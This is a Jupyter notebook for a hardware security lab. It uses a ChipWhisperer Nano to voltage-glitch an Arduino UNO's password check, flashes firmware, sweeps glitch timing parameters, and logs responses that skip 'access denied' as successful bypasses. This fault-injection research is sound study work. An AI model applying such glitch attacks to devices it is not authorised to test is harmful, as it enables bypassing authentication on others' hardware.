# Voltage glitching on Arduino UNO

In [1]:
SCOPETYPE = 'CWNANO'
PLATFORM = 'CWNANO'
SS_VER = 'SS_VER_2_1'

## Connect to ChipWhisperer

In [114]:
import chipwhisperer as cw
import time

try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope()

try:
    if SS_VER == "SS_VER_2_1":
        target_type = cw.targets.SimpleSerial2
    elif SS_VER == "SS_VER_2_0":
        raise OSError("SS_VER_2_0 is deprecated. Use SS_VER_2_1")
    else:
        target_type = cw.targets.SimpleSerial
except:
    SS_VER="SS_VER_1_1"
    target_type = cw.targets.SimpleSerial

try:
    target = cw.target(scope, target_type)
except:
    print("INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.")
    print("INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.")
    scope = cw.scope()
    target = cw.target(scope, target_type)

time.sleep(0.05)
scope.default_setup()

print("INFO: Found ChipWhisperer😍")

INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.
INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.
INFO: Found ChipWhisperer😍


In [115]:
if "STM" in PLATFORM or PLATFORM == "CWLITEARM" or PLATFORM == "CWNANO":
    prog = cw.programmers.STM32FProgrammer
elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
    prog = cw.programmers.XMEGAProgrammer
elif "neorv32" in PLATFORM.lower():
    prog = cw.programmers.NEORV32Programmer
elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
    prog = cw.programmers.SAM4SProgrammer
else:
    prog = None

## Firmware for external target usage

To avoid having the STM32F0 GPIOs driven by the CW-Nano when interacting with an external target, set them as high impedance.

In [74]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ./firmware
make PLATFORM=$1 CRYPTO_TARGET=NONE SS_VER=$2 -j

SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
arm-none-eabi-gcc (15:13.2.rel1-2) 13.2.1 20231009
Copyright (C) 2023 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

mkdir -p objdir-CWNANO 
.
Welcome to another exciting ChipWhisperer target build!!
.
.
.
.
Compiling:
.
Compiling:
.
Compiling:
Compiling:
Compiling:
-en     ../../../firmware/mcu/simpleserial/simpleserial.c ...
Assembling: ../../../firmware/mcu/hal//stm32f0/stm32f0_startup.S
-en     gpio-tristate.c ...
arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -ffunction-sections -DF_CPU=7372800 -Wa,-gstabs,-adhlns=objdir-CWNANO/stm32f0_startup.lst -I../../../firmware/mcu/simpleserial/ -I../../../firmware/mcu/hal/ -I../../../firmware/mcu/hal/ -I../../../firmware/mcu/hal//stm32f0 -I../../../firmware/mcu/hal//stm32f0/CMSIS -I../../../firmware/mcu/hal//stm32f0/C

/usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/bin/ld: /usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/lib/thumb/v6-m/nofp/libg_nano.a(libc_a-closer.o): in function `_close_r':


/usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/bin/ld: /usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/lib/thumb/v6-m/nofp/libg_nano.a(libc_a-closer.o): note: the message above does not take linker garbage collection into account
/usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/bin/ld: /usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/lib/thumb/v6-m/nofp/libg_nano.a(libc_a-lseekr.o): note: the message above does not take linker garbage collection into account
/usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/bin/ld: /usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/lib/thumb/v6-m/nofp/libg_nano.a(libc_a-readr.o): note: the message above does not take linker garbage collection into account


/usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/bin/ld: /usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/lib/thumb/v6-m/nofp/libg_nano.a(libc_a-lseekr.o): in function `_lseek_r':
/usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/bin/ld: /usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/lib/thumb/v6-m/nofp/libg_nano.a(libc_a-readr.o): in function `_read_r':
/usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/bin/ld: /usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/lib/thumb/v6-m/nofp/libg_nano.a(libc_a-writer.o): in function `_write_r':


/usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/bin/ld: /usr/lib/gcc/arm-none-eabi/13.2.1/../../../arm-none-eabi/lib/thumb/v6-m/nofp/libg_nano.a(libc_a-writer.o): note: the message above does not take linker garbage collection into account
-e Done!
.
.
.
.
.
Creating load file for Flash: arduino_voltage_glitching-CWNANO.hex
arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature arduino_voltage_glitching-CWNANO.elf arduino_voltage_glitching-CWNANO.hex
Creating load file for Flash: arduino_voltage_glitching-CWNANO.bin
Creating load file for EEPROM: arduino_voltage_glitching-CWNANO.eep
arm-none-eabi-objcopy -O binary -R .eeprom -R .fuse -R .lock -R .signature arduino_voltage_glitching-CWNANO.elf arduino_voltage_glitching-CWNANO.bin
arm-none-eabi-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \
Creating Extended Listing: arduino_voltage_glitching-CWNANO.lss
arm-none-eabi-objdump -h -S -z arduino_voltage_glitching-CWNANO.elf > arduino_voltage_glitchin

In [79]:
fw_path = f"./firmware/arduino_voltage_glitching-{PLATFORM}.hex"
cw.program_target(scope, prog, fw_path)

Detected known STMF32: STM32F04xxx
Extended erase (0x44), this can take ten seconds or more
Attempting to program 2455 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 2455 bytes


## Attack !

In [128]:
import chipwhisperer as cw
import serial
import serial.tools.list_ports
import time
import datetime
from pathlib import Path

In [130]:
BAUDRATE = 9600
# Find serial port
SERIAL_PORT = "COM7"
print(f"{scope.get_serial_ports()[0]["port"]}: ChipWhisperer USB port")
ports = serial.tools.list_ports.comports()
for port, desc, _ in sorted(ports):
    if "CH340" in desc:
        print(f"{port}: {desc}\n")
        SERIAL_PORT = port

KNOWN_FAILURE_KEYWORDS = ["access denied", "no input", "enter password"]

# Output folder for logs/traces
results_dir = Path("results")
results_dir.mkdir(exist_ok=True)

COM3: ChipWhisperer USB port
COM7: USB-SERIAL CH340 (COM7)



### One glitch test

#### Using ChipWhisperer TIO1/TIO2 UART

In [83]:
ext_offset = 10
repeat = 100

cw.set_all_log_levels(cw.logging.CRITICAL)

target.baud = 9600   # match your Arduino sketch
scope.glitch.ext_offset = ext_offset # The glitch will be inserted roughly 8.3ns * scope.glitch.ext_offset
scope.glitch.repeat = repeat # The glitch will be inserted for roughly 8.3ns * scope.glitch.repeat
scope.arm() # Turn ON ARM LED & wait for trigger signal

# Send a wrong password
target.ser.write(b"1234\n")
ret = scope.capture()  # disarm the scope & return a timeout if no trigger was found since arm
if ret:
    print('Timeout - no trigger')
print("Response:", target.ser.read(100))

cw.set_all_log_levels(cw.logging.WARNING)

Response: >> ACCESS DENIED

Enter password:



#### Using CH340 UART

In [123]:
ext_offset = 10
repeat = 10

cw.set_all_log_levels(cw.logging.CRITICAL)

scope.glitch.ext_offset = ext_offset # The glitch will be inserted at roughly 8.3ns * scope.glitch.ext_offset
scope.glitch.repeat = repeat # The glitch will be inserted for roughly 8.3ns * scope.glitch.repeat
scope.arm() # Turn ON ARM LED & wait for trigger signal

with serial.Serial(SERIAL_PORT, BAUDRATE, timeout=.1) as ser:
    ser.write("password\n".encode()) # Send password which makes Arduino code send the trigger
    ret = scope.capture()  # disarm the scope & return a timeout if no trigger was found since arm
    
    if ret:
        print('Timeout - no trigger')
        
    print(f"Glitch {repeat=}, {ext_offset=}")
    print("Response lines:")
    for line in ser.readlines():
        line = line.decode().strip()
        if line != "":
            print(line)
    
cw.set_all_log_levels(cw.logging.WARNING)

Glitch repeat=10, ext_offset=10
Response lines:
>> ACCESS DENIED
Enter password:


### Helper functions

In [124]:
def decode_lines(lines: list[bytes]) -> list[str]:
    """Decode lines bytes, strip whitespaces/newlines and remove empties."""
    decoded = []
    for line in lines:
        if isinstance(line, bytes):
            line = line.decode(errors="replace") # Replace non utf-8 characters by a special character
        line = line.strip()
        if line:
            decoded.append(line)
    return decoded

def is_success_response(lines: list[str]) -> bool:
    """
    Return True if any lines are known success markers.
    Considered success only if NONE of the known failure keywords appear in a line.
    """
    if not lines:
        return False
    for ln in lines:
        low = ln.lower()
        if all(fk not in low for fk in KNOWN_FAILURE_KEYWORDS):
            return True
    return False

def reset_arduino(scope):
    scope.io.nrst = False
    time.sleep(0.05)
    scope.io.nrst = "high_z"
    time.sleep(0.05)
    # Need 2s delay between Arduino Reset and serial availability
    time.sleep(2)

### Glitch loop

In [125]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["repeat", "ext_offset"])

In [139]:
cw.set_all_log_levels(cw.logging.CRITICAL)

gc.display_stats()

repeat_range = 1, 20
ext_offset_range = 1, 100
gc.set_global_step(0.5)
gc.set_range("repeat", *repeat_range)
gc.set_range("ext_offset", *ext_offset_range)
gc.set_step("ext_offset", 5)

now_ts = datetime.datetime.now().strftime("%Y-%m-%d_%H.%M.%S")
log_path = results_dir / f"attack_log_{now_ts}.txt"

with open(log_path, "w", encoding="utf-8") as logf:
    logf.write(f"Glitch run started: {datetime.datetime.now().isoformat()}\n")
    logf.write(f"Parameters: repeat range {repeat_range}, ext_offset range {ext_offset_range}\n")
    logf.write("="*60 + "\n\n")
    
    for glitch_setting in gc.glitch_values():
        repeat_val, ext_offset_val = glitch_setting[0], glitch_setting[1]
        scope.glitch.repeat = repeat_val # The glitch will be inserted for roughly 8.3ns * scope.glitch.repeat
        scope.glitch.ext_offset = ext_offset_val # The glitch will be inserted at roughly 8.3ns * scope.glitch.ext_offset

        # metadata header for this parameter combination
        header = f"[{datetime.datetime.now().isoformat()}] Trying repeat={repeat_val}, ext_offset={ext_offset_val}\n"
        logf.write(header)

        try:
            with serial.Serial(SERIAL_PORT, BAUDRATE, timeout=.1) as ser:
                for attempt in range(1, 6):
                    attempt_header = f"\tAttempt {attempt} - time {datetime.datetime.now().isoformat()}\n"
                    logf.write(attempt_header)
                    
                    scope.arm() # Turn ON ARM LED & wait for trigger signal
                    
                    # Send a wrong password which makes Arduino code send the trigger
                    ser.write(b"password\n") # Sends : >> ACCESS DENIED
                    # ser.write(b"\n") # Sends : No input. Enter password:
                    
                    ret = scope.capture() # disarm the scope & return a timeout if no trigger was found since arm
            
                    if ret:
                        msg = "\tTimeout - no trigger -> Reset\n"
                        logf.write(msg)
                        reset_arduino(scope)
                        gc.add("reset", (repeat_val, ext_offset_val))
                    else:
                        # Read all response lines
                        lines = ser.readlines()
                        decoded_lines = decode_lines(lines)
                        for dl in decoded_lines:
                            logf.write(f"\t  {dl}\n")
                        
                        if len(lines) == 0:
                            msg = "\tNothing received -> Reset\n"
                            logf.write(msg)
                            reset_arduino(scope)
                            gc.add("reset", (repeat_val, ext_offset_val))
                        else:
                            if is_success_response(decoded_lines): # If response is not an access denied message
                                gc.add("success", (repeat_val, ext_offset_val))
                                success_msg = f"\tSUCCESS for repeat={repeat_val}, ext_offset={ext_offset_val} (attempt {attempt})\n"
                                print(success_msg.strip())
                                logf.write(success_msg)
                                for line in decoded_lines:
                                    print(f"\t{line}")
                                break # Start with new repeat & ext_offset values
                            else:
                                gc.add("normal", (repeat_val, ext_offset_val))
        except Exception as e:
            # Log any exceptions (serial errors, etc.)
            err_msg = f"  Exception while opening/using serial: {e}\n"
            print(err_msg.strip())
            logf.write(err_msg)

    logf.write("\n" + "="*60 + "\n")
    logf.write(f"Glitch run finished: {datetime.datetime.now().isoformat()}\n")
                
cw.set_all_log_levels(cw.logging.WARNING)

print(f"Saved log file to: {log_path}")

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=10.0, continuous_update=False, description='repeat setting:', disabled=True, min=10.0, reado…

FloatSlider(value=1.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=2000.0, …

Saved log file to: results\attack_log_2025-10-22_16.14.26.txt


## Results

In [142]:
import matplotlib.pylab as plt
%matplotlib widget
gc.results.plot_2d(plotdots={"success":"+g", "reset":"xr", "normal":"ob"})

[0, 1]
['repeat', 'ext_offset']
(1, 1)


In [101]:
scope.dis()
target.dis()